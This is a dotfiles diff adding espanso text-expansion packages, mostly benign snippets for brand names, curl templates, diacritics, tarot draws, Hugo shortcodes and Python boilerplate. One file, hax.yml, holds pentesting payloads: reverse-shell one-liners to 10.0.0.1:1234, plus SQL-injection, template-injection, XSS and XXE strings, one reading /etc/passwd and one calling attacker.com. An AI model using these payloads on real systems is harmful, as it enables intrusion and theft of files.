|
||||||
|
- trigger: "rackspace"
|
||||||
|
replace: "Rackspace"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "rapidweaver"
|
||||||
|
replace: "RapidWeaver"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "reva"
|
||||||
|
replace: "Reva"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "salesforce"
|
||||||
|
replace: "Salesforce"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "sanebox"
|
||||||
|
replace: "SaneBox"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "smartlink"
|
||||||
|
replace: "SmartLink"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "smartsearch"
|
||||||
|
replace: "SmartSearch"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "snapchat"
|
||||||
|
replace: "Snapchat"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "ssnif"
|
||||||
|
replace: "SSNiF"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "testrail"
|
||||||
|
replace: "TestRail"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "touchbar"
|
||||||
|
replace: "Touch Bar"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "transferwise"
|
||||||
|
replace: "TransferWise"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wikipedia"
|
||||||
|
replace: "Wikipedia"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wordpress"
|
||||||
|
replace: "WordPress"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "wufoo"
|
||||||
|
replace: "Wufoo"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
|
|
||||||
|
- trigger: "xing"
|
||||||
|
replace: "XING"
|
||||||
|
propagate_case: true
|
||||||
|
word: true
|
||||||
18
espanso/.config/espanso/match/packages/cht.yml
Normal file
18
espanso/.config/espanso/match/packages/cht.yml
Normal file
|
|
@ -0,0 +1,18 @@
|
||||||
|
# cht package
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- regex: ":cht/(?P<command>.*)/"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: 'curl "https://cht.sh/{{command}}?QT&style=bw"'
|
||||||
|
|
||||||
|
- regex: ":vcht/(?P<command>.*)/"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: 'curl "https://cht.sh/{{command}}?qT&style=bw"'
|
||||||
|
|
@ -0,0 +1,63 @@
|
||||||
|
matches:
|
||||||
|
- trigger: ":vec:" # e.g.: x⃗
|
||||||
|
replace: "\u20d7"
|
||||||
|
|
||||||
|
- triggers: [":underrightarrow:", ":ura:"] # e.g.: x⃯
|
||||||
|
replace: "\u20ef"
|
||||||
|
|
||||||
|
- triggers: [":underleftarrow:", ":ula:"] # e.g.: x⃮
|
||||||
|
replace: "\u20ee"
|
||||||
|
|
||||||
|
- triggers: [":overleftarrow:", ":ola:"] # e.g.: x⃡
|
||||||
|
replace: "\u20e1"
|
||||||
|
|
||||||
|
- triggers: [":underline:", ":ul:"] # e.g.: x̲
|
||||||
|
replace: "\u0332"
|
||||||
|
|
||||||
|
- trigger: ":bar:" # e.g.: x̅
|
||||||
|
replace: "\u0305"
|
||||||
|
|
||||||
|
- trigger: ":acute:" # e.g.: x́
|
||||||
|
replace: "\u0301"
|
||||||
|
|
||||||
|
- trigger: ":macron:" # e.g.: x̄
|
||||||
|
replace: "\u0304"
|
||||||
|
|
||||||
|
- trigger: ":breve:" # e.g.: x̆
|
||||||
|
replace: "\u0306"
|
||||||
|
|
||||||
|
- trigger: ":caron:" # e.g.: x̌
|
||||||
|
replace: "\u030c"
|
||||||
|
|
||||||
|
- trigger: ":ddddot:" # e.g.: x⃛
|
||||||
|
replace: "\u20dc"
|
||||||
|
|
||||||
|
- trigger: ":dddot:" # e.g.: x⃛
|
||||||
|
replace: "\u20db"
|
||||||
|
|
||||||
|
- trigger: ":ddot:" # e.g.: ẍ
|
||||||
|
replace: "\u0308"
|
||||||
|
|
||||||
|
- trigger: ":dot:" # e.g.: ẋ
|
||||||
|
replace: "\u0307"
|
||||||
|
|
||||||
|
- trigger: ":grave:" # e.g.: x̀
|
||||||
|
replace: "\u0300"
|
||||||
|
|
||||||
|
- trigger: ":hat:" # e.g.: x̂
|
||||||
|
replace: "\u0302"
|
||||||
|
|
||||||
|
- trigger: ":widehat:" # e.g.: x̂
|
||||||
|
replace: "\u0302"
|
||||||
|
|
||||||
|
- trigger: ":tilde:" # e.g.: x̃
|
||||||
|
replace: "\u0303"
|
||||||
|
|
||||||
|
- trigger: ":widetilde:" # e.g.: x̃
|
||||||
|
replace: "\u0303"
|
||||||
|
|
||||||
|
- trigger: ":ring:" # e.g.: x̊
|
||||||
|
replace: "\u030a"
|
||||||
|
|
||||||
|
- triggers: [":not:", ":slash:"] # e.g.: x̸
|
||||||
|
replace: "\u0338"
|
||||||
64
espanso/.config/espanso/match/packages/curl.yml
Normal file
64
espanso/.config/espanso/match/packages/curl.yml
Normal file
|
|
@ -0,0 +1,64 @@
|
||||||
|
# curl package
|
||||||
|
|
||||||
|
name: curl
|
||||||
|
parent: default
|
||||||
|
|
||||||
|
global_vars:
|
||||||
|
- name: curlform
|
||||||
|
type: form
|
||||||
|
params:
|
||||||
|
layout: Target [[protocol]]://[[URL]]
|
||||||
|
fields:
|
||||||
|
protocol:
|
||||||
|
type: choice
|
||||||
|
values: [https, http]
|
||||||
|
default: https
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- trigger: ":curl:"
|
||||||
|
replace: "curl --request GET {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlget:"
|
||||||
|
replace: "curl --request GET {{curlform.protocol}}://{{curlform.URL}}?key=value"
|
||||||
|
|
||||||
|
- trigger: ":curlpost:"
|
||||||
|
replace: "curl --request POST {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlput:"
|
||||||
|
replace: "curl --request PUT {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldelete:"
|
||||||
|
replace: "curl --request DELETE {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlpatch:"
|
||||||
|
replace: "curl --request PATCH {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldata:"
|
||||||
|
replace: "curl --request POST --header 'Content-Type: multipart/form-data' --form 'key=value' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlxml:"
|
||||||
|
replace: "curl --request POST --header 'Content-Type: application/xml' --data '<key>value</key>' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curljson:"
|
||||||
|
replace: 'curl --request POST --header ''Content-Type: application/json'' --data ''{"key":"value"}'' {{curlform.protocol}}://{{curlform.URL}}'
|
||||||
|
|
||||||
|
- trigger: ":curlheader:"
|
||||||
|
replace: "curl --request GET --header 'X-My-Header: 123' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlcookie:"
|
||||||
|
replace: "curl --request GET --cookie 'key=value' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlbasic:"
|
||||||
|
replace: "curl --request GET --user 'username:password' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlbearer:"
|
||||||
|
replace: "curl --request GET --header 'Authorization: Bearer token' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlproxy:"
|
||||||
|
replace: "curl --request GET --proxy http://proxy.example.com:8080 {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curldownload:"
|
||||||
|
replace: "curl --request GET --output file.txt {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
|
|
||||||
|
- trigger: ":curlupload:"
|
||||||
|
replace: "curl --request POST --form 'file=@/path/to/file' {{curlform.protocol}}://{{curlform.URL}}"
|
||||||
300
espanso/.config/espanso/match/packages/divination-oracles.yml
Normal file
300
espanso/.config/espanso/match/packages/divination-oracles.yml
Normal file
|
|
@ -0,0 +1,300 @@
|
||||||
|
# Returns a random playing card from a standard 52 card deck, with no jokers
|
||||||
|
matches:
|
||||||
|
- trigger: ":card:"
|
||||||
|
replace: "{{number}} of {{suit}}"
|
||||||
|
vars:
|
||||||
|
- name: number
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Ace"
|
||||||
|
- "2"
|
||||||
|
- "3"
|
||||||
|
- "4"
|
||||||
|
- "5"
|
||||||
|
- "6"
|
||||||
|
- "7"
|
||||||
|
- "8"
|
||||||
|
- "9"
|
||||||
|
- "10"
|
||||||
|
- "Jack"
|
||||||
|
- "Queen"
|
||||||
|
- "King"
|
||||||
|
- name: suit
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Hearts"
|
||||||
|
- "Clubs"
|
||||||
|
- "Diamonds"
|
||||||
|
- "Spades"
|
||||||
|
|
||||||
|
# Returns a random playing card from a 54 card deck, including 2 jokers
|
||||||
|
- trigger: ":cardj:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Ace of Hearts"
|
||||||
|
- "2 of Hearts"
|
||||||
|
- "3 of Hearts"
|
||||||
|
- "4 of Hearts"
|
||||||
|
- "5 of Hearts"
|
||||||
|
- "6 of Hearts"
|
||||||
|
- "7 of Hearts"
|
||||||
|
- "8 of Hearts"
|
||||||
|
- "9 of Hearts"
|
||||||
|
- "10 of Hearts"
|
||||||
|
- "Jack of Hearts"
|
||||||
|
- "Queen of Hearts"
|
||||||
|
- "King of Hearts"
|
||||||
|
- "Ace of Clubs"
|
||||||
|
- "2 of Clubs"
|
||||||
|
- "3 of Clubs"
|
||||||
|
- "4 of Clubs"
|
||||||
|
- "5 of Clubs"
|
||||||
|
- "6 of Clubs"
|
||||||
|
- "7 of Clubs"
|
||||||
|
- "8 of Clubs"
|
||||||
|
- "9 of Clubs"
|
||||||
|
- "10 of Clubs"
|
||||||
|
- "Jack of Clubs"
|
||||||
|
- "Queen of Clubs"
|
||||||
|
- "King of Clubs"
|
||||||
|
- "Ace of Diamonds"
|
||||||
|
- "2 of Diamonds"
|
||||||
|
- "3 of Diamonds"
|
||||||
|
- "4 of Diamonds"
|
||||||
|
- "5 of Diamonds"
|
||||||
|
- "6 of Diamonds"
|
||||||
|
- "7 of Diamonds"
|
||||||
|
- "8 of Diamonds"
|
||||||
|
- "9 of Diamonds"
|
||||||
|
- "10 of Diamonds"
|
||||||
|
- "Jack of Diamonds"
|
||||||
|
- "Queen of Diamonds"
|
||||||
|
- "King of Diamonds"
|
||||||
|
- "Ace of Spades"
|
||||||
|
- "2 of Spades"
|
||||||
|
- "3 of Spades"
|
||||||
|
- "4 of Spades"
|
||||||
|
- "5 of Spades"
|
||||||
|
- "6 of Spades"
|
||||||
|
- "7 of Spades"
|
||||||
|
- "8 of Spades"
|
||||||
|
- "9 of Spades"
|
||||||
|
- "10 of Spades"
|
||||||
|
- "Jack of Spades"
|
||||||
|
- "Queen of Spades"
|
||||||
|
- "King of Spades"
|
||||||
|
- "Joker"
|
||||||
|
- "Joker"
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck
|
||||||
|
- trigger: ":tarot:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "The Fool (0)"
|
||||||
|
- "The Magician (1)"
|
||||||
|
- "The High Priestess (2)"
|
||||||
|
- "The Empress (3)"
|
||||||
|
- "The Emperor (4)"
|
||||||
|
- "The Hierophant (5)"
|
||||||
|
- "The Lovers (6)"
|
||||||
|
- "The Chariot (7)"
|
||||||
|
- "Strength (8)"
|
||||||
|
- "The Hermit (9)"
|
||||||
|
- "Wheel of Fortune (10)"
|
||||||
|
- "Justice (11)"
|
||||||
|
- "The Hanged Man (12)"
|
||||||
|
- "Death (13)"
|
||||||
|
- "Temperance (14)"
|
||||||
|
- "The Devil (15)"
|
||||||
|
- "The Tower (16)"
|
||||||
|
- "The Star (17)"
|
||||||
|
- "The Moon (18)"
|
||||||
|
- "The Sun (19)"
|
||||||
|
- "Judgment (20)"
|
||||||
|
- "The World (21)"
|
||||||
|
- "Ace of Wands"
|
||||||
|
- "2 of Wands"
|
||||||
|
- "3 of Wands"
|
||||||
|
- "4 of Wands"
|
||||||
|
- "5 of Wands"
|
||||||
|
- "6 of Wands"
|
||||||
|
- "7 of Wands"
|
||||||
|
- "8 of Wands"
|
||||||
|
- "9 of Wands"
|
||||||
|
- "10 of Wands"
|
||||||
|
- "Page of Wands"
|
||||||
|
- "Knight of Wands"
|
||||||
|
- "Queen of Wands"
|
||||||
|
- "King of Wands"
|
||||||
|
- "Ace of Cups"
|
||||||
|
- "2 of Cups"
|
||||||
|
- "3 of Cups"
|
||||||
|
- "4 of Cups"
|
||||||
|
- "5 of Cups"
|
||||||
|
- "6 of Cups"
|
||||||
|
- "7 of Cups"
|
||||||
|
- "8 of Cups"
|
||||||
|
- "9 of Cups"
|
||||||
|
- "10 of Cups"
|
||||||
|
- "Page of Cups"
|
||||||
|
- "Knight of Cups"
|
||||||
|
- "Queen of Cups"
|
||||||
|
- "King of Cups"
|
||||||
|
- "Ace of Swords"
|
||||||
|
- "2 of Swords"
|
||||||
|
- "3 of Swords"
|
||||||
|
- "4 of Swords"
|
||||||
|
- "5 of Swords"
|
||||||
|
- "6 of Swords"
|
||||||
|
- "7 of Swords"
|
||||||
|
- "8 of Swords"
|
||||||
|
- "9 of Swords"
|
||||||
|
- "10 of Swords"
|
||||||
|
- "Page of Swords"
|
||||||
|
- "Knight of Swords"
|
||||||
|
- "Queen of Swords"
|
||||||
|
- "King of Swords"
|
||||||
|
- "Ace of Pentacles"
|
||||||
|
- "2 of Pentacles"
|
||||||
|
- "3 of Pentacles"
|
||||||
|
- "4 of Pentacles"
|
||||||
|
- "5 of Pentacles"
|
||||||
|
- "6 of Pentacles"
|
||||||
|
- "7 of Pentacles"
|
||||||
|
- "8 of Pentacles"
|
||||||
|
- "9 of Pentacles"
|
||||||
|
- "10 of Pentacles"
|
||||||
|
- "Page of Pentacles"
|
||||||
|
- "Knight of Pentacles"
|
||||||
|
- "Queen of Pentacles"
|
||||||
|
- "King of Pentacles"
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 25% chance of it being reversed
|
||||||
|
- trigger: ":tarot25:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 20% chance of it being reversed
|
||||||
|
- trigger: ":tarot20:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 10% chance of it being reversed
|
||||||
|
- trigger: ":tarot10:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a standard 78-card tarot deck, with a 5% chance of it being reversed
|
||||||
|
- trigger: ":tarot5:"
|
||||||
|
replace: "{{nested}}{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: nested
|
||||||
|
type: match
|
||||||
|
params:
|
||||||
|
trigger: ":tarot:"
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- " reversed"
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
- ""
|
||||||
|
|
||||||
|
# Returns a random card from a 36-card Lenormand deck
|
||||||
|
- trigger: ":lenormand:"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: output
|
||||||
|
type: random
|
||||||
|
params:
|
||||||
|
choices:
|
||||||
|
- "Rider (1)"
|
||||||
|
- "Clover (2)"
|
||||||
|
- "Ship (3)"
|
||||||
|
- "House (4)"
|
||||||
|
- "Tree (5)"
|
||||||
|
- "Clouds (6)"
|
||||||
|
- "Snake (7)"
|
||||||
|
- "Coffin (8)"
|
||||||
|
- "Bouquet (9)"
|
||||||
|
- "Scythe (10)"
|
||||||
|
- "Whip (11)"
|
||||||
|
- "Birds (12)"
|
||||||
|
- "Child (13)"
|
||||||
|
- "Fox (14)"
|
||||||
|
- "Bear (15)"
|
||||||
|
- "Stars (16)"
|
||||||
|
- "Stork (17)"
|
||||||
|
- "Dog (18)"
|
||||||
|
- "Tower (19)"
|
||||||
|
- "Garden (20)"
|
||||||
58
espanso/.config/espanso/match/packages/hax.yml
Normal file
58
espanso/.config/espanso/match/packages/hax.yml
Normal file
|
|
@ -0,0 +1,58 @@
|
||||||
|
atches:
|
||||||
|
# Reverse Shells
|
||||||
|
- trigger: ":rev-perl"
|
||||||
|
replace: "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
|
||||||
|
- trigger: ":rev-python"
|
||||||
|
replace: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
||||||
|
- trigger: ":rev-php"
|
||||||
|
replace: "php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
|
||||||
|
- trigger: ":rev-ruby"
|
||||||
|
replace: "ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
|
||||||
|
- trigger: ":rev-nc"
|
||||||
|
replace: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"
|
||||||
|
|
||||||
|
# SQL Injection Payloads
|
||||||
|
- trigger: ":sqli-poly"
|
||||||
|
replace: "SLEEP(1) /*' or SLEEP(1) or '\" or SLEEP(1) or \"*/"
|
||||||
|
|
||||||
|
# Server-side Template Injection Payloads
|
||||||
|
- trigger: ":ssti-asp"
|
||||||
|
replace: "@(1+2)"
|
||||||
|
- trigger: ":ssti-el"
|
||||||
|
replace: "${1+1}"
|
||||||
|
- trigger: ":ssti-el-alt"
|
||||||
|
replace: "#{1+1}"
|
||||||
|
- trigger: ":ssti-groovy"
|
||||||
|
replace: "${\"http://www.google.com\".toURL().text}"
|
||||||
|
- trigger: ":ssti-groovy-alt"
|
||||||
|
replace: "${new URL(\"http://www.google.com\").getText()}"
|
||||||
|
- trigger: ":ssti-jinja"
|
||||||
|
replace: "{{4*4}}[[5*5]]"
|
||||||
|
- trigger: ":ssti-ruby-file"
|
||||||
|
replace: "<%= File.open('/etc/passwd').read %>"
|
||||||
|
- trigger: ":ssti-ruby-dir"
|
||||||
|
replace: "<%= Dir.entries('/') %>"
|
||||||
|
- trigger: ":ssti-smarty"
|
||||||
|
replace: "{$smarty.version}"
|
||||||
|
- trigger: ":ssti-twig"
|
||||||
|
replace: "{{dump(app)}}"
|
||||||
|
- trigger: ":ssti-velocity"
|
||||||
|
replace: "#set($str=$class.inspect(\"java.lang.String\").type)"
|
||||||
|
|
||||||
|
# Cross-site Scripting Payloads
|
||||||
|
- trigger: ":xss-basic"
|
||||||
|
replace: "<script>confirm`1`</script>"
|
||||||
|
- trigger: ":xss-img"
|
||||||
|
replace: "<img src=a onerror=confirm`1`/>"
|
||||||
|
- trigger: ":xss-dom"
|
||||||
|
replace: "#\"><img src=/ onerror=alert(1)>"
|
||||||
|
- trigger: ":xss-markdown"
|
||||||
|
replace: "[a](javascript:prompt(1))"
|
||||||
|
- trigger: ":xss-poly"
|
||||||
|
replace: "\" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//"
|
||||||
|
|
||||||
|
# External XML Entity Injection Payloads
|
||||||
|
- trigger: ":xxe-file"
|
||||||
|
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>"
|
||||||
|
- trigger: ":xxe-http"
|
||||||
|
replace: "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'http://attacker.com'>]><root>&test;</root>"
|
||||||
45
espanso/.config/espanso/match/packages/hugo-shortcodes.yml
Normal file
45
espanso/.config/espanso/match/packages/hugo-shortcodes.yml
Normal file
|
|
@ -0,0 +1,45 @@
|
||||||
|
# 2022-03-12T12:00:49+0000
|
||||||
|
# salopst
|
||||||
|
#
|
||||||
|
# Some Espanso triggers for Hugo Shortcodes
|
||||||
|
# https://gohugo.io/content-management/shortcodes/
|
||||||
|
|
||||||
|
|
||||||
|
matches:
|
||||||
|
- trigger: ":hf"
|
||||||
|
replace: "{{< figure src=\"$|$\" title=\"FIGURE_TITLE\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":hg"
|
||||||
|
replace: "{{< gist GIT_USER_NAME GIST_ID >}}"
|
||||||
|
|
||||||
|
- trigger: ":hil"
|
||||||
|
replace: |-
|
||||||
|
{{< highlight $|$SYNTAX_LANG >}}
|
||||||
|
|
||||||
|
{{< /highlight >}}
|
||||||
|
|
||||||
|
- trigger: ":hin"
|
||||||
|
replace: "{{< instagram $|$INSTAGRAM_ID hidecaption >}}"
|
||||||
|
|
||||||
|
- trigger: ":hp"
|
||||||
|
replace: "{{< param $|$PARAMETER_NAME >}}"
|
||||||
|
|
||||||
|
# generates absolute href
|
||||||
|
- trigger: ":href"
|
||||||
|
replace: "{{< ref \"$|$ANCHOR_TARGET\" >}}"
|
||||||
|
|
||||||
|
# generates relative href
|
||||||
|
- trigger: ":hrel"
|
||||||
|
replace: "{{< relref \"$|$ANCHOR_TARGET\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":ht"
|
||||||
|
replace: "{{< tweet user=\"$|$\" id=\"TWEET_ID\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":hv"
|
||||||
|
replace: "{{< vimeo $|$VIMEO_ID >}}"
|
||||||
|
|
||||||
|
- trigger: ":hy"
|
||||||
|
replace: "{{< youtube id=\"$|$YOUTUBE_ID\" title=\"VIDEO_TITLE\" autoplay=\"TRUE_|_FALSE\" >}}"
|
||||||
|
|
||||||
|
- trigger: ":him"
|
||||||
|
replace: "{{< image src=\"/uploads/$|$IMAGE_FILE_NAME\" alt=\"ALT_TEXT\" position=\"center\" style=\"border-radius: 30px;\" >}}"
|
||||||
19
espanso/.config/espanso/match/packages/lower-upper.yml
Normal file
19
espanso/.config/espanso/match/packages/lower-upper.yml
Normal file
|
|
@ -0,0 +1,19 @@
|
||||||
|
matches:
|
||||||
|
- trigger: "::low"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: "clipboard"
|
||||||
|
type: "clipboard"
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: "echo $ESPANSO_CLIPBOARD | tr '[:upper:]' '[:lower:]'"
|
||||||
|
- trigger: "::up"
|
||||||
|
replace: "{{output}}"
|
||||||
|
vars:
|
||||||
|
- name: "clipboard"
|
||||||
|
type: "clipboard"
|
||||||
|
- name: output
|
||||||
|
type: shell
|
||||||
|
params:
|
||||||
|
cmd: "echo $ESPANSO_CLIPBOARD | tr '[:lower:]' '[:upper:]'"
|
||||||
|
|
@ -0,0 +1,38 @@
|
||||||
|
matches:
|
||||||
|
# æøå
|
||||||
|
- trigger: ":ae"
|
||||||
|
label: "æÆ"
|
||||||
|
replace: "æ"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":oe"
|
||||||
|
label: "øØ"
|
||||||
|
replace: "ø"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":aa"
|
||||||
|
label: "åÅ"
|
||||||
|
replace: "å"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# acute accents
|
||||||
|
- trigger: ":e'"
|
||||||
|
label: "éÉ (e acute)"
|
||||||
|
replace: "é"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# grave accents
|
||||||
|
- trigger: ":a`"
|
||||||
|
label : "àÀ (a grave)"
|
||||||
|
replace: "à"
|
||||||
|
propagate_case: true
|
||||||
|
- trigger: ":o`"
|
||||||
|
label: "òÒ (o grave)"
|
||||||
|
replace: "ò"
|
||||||
|
propagate_case: true
|
||||||
|
|
||||||
|
# Norwegian quote marks
|
||||||
|
- trigger: ":`"
|
||||||
|
label: "« (open quote)"
|
||||||
|
replace: "«"
|
||||||
|
- trigger: ":'"
|
||||||
|
label: "» (close quote)"
|
||||||
|
replace: "»"
|
||||||
60
espanso/.config/espanso/match/packages/python-utils.yml
Normal file
60
espanso/.config/espanso/match/packages/python-utils.yml
Normal file
|
|
@ -0,0 +1,60 @@
|
||||||
|
matches:
|
||||||
|
- trigger: ":pymain"
|
||||||
|
replace: |
|
||||||
|
def main() -> None:
|
||||||
|
$|$
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
|
- trigger: ":pycls"
|
||||||
|
replace: |
|
||||||
|
class $|$:
|
||||||
|
def __init__(self) -> None:
|
||||||
|
|
||||||
|
|
||||||
|
def method_1(self) -> None:
|
||||||
|
|
||||||
|
- trigger: ":pydef"
|
||||||
|
replace: |
|
||||||
|
def $|$():
|
||||||
|
|
||||||
|
return
|
||||||
|
- trigger: ":pymatch"
|
||||||
|
replace: |
|
||||||
|
match $|$:
|
||||||
|
case :
|
||||||
|
|
||||||
|
case _:
|
||||||
|
|
||||||
|
- trigger: ":pytry"
|
||||||
|
replace: |
|
||||||
|
try:
|
||||||
|
|
||||||
|
except $|$ as e:
|
||||||
|
|
||||||
|
- trigger: ":pyboiler:args"
|
||||||
|
replace: |
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
def main(args: argparse.Namespace) -> None:
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
|
||||||
|
parser.add_argument("$|$")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
main(args)
|
||||||
|
- trigger: ":pyboiler:log"
|
||||||
|
replace: |
|
||||||
|
import logging
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
def main() -> None:
|
||||||
|
logger.debug("Logger working")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
logging.basicConfig(level=logging.DEBUG, format="%(levelname)s %(asctime)s: %(message)s")
|
||||||
|
|
||||||
|
main()
|
||||||
52
ghostty/.config/ghostty/bloom.glsl
Normal file
52
ghostty/.config/ghostty/bloom.glsl
Normal file
|
|
@ -0,0 +1,52 @@
|
||||||
|
// source: https://gist.github.com/qwerasd205/c3da6c610c8ffe17d6d2d3cc7068f17f
|
||||||
|
// credits: https://github.com/qwerasd205
|
||||||
|
// Golden spiral samples, [x, y, weight] weight is inverse of distance.
|
||||||
|
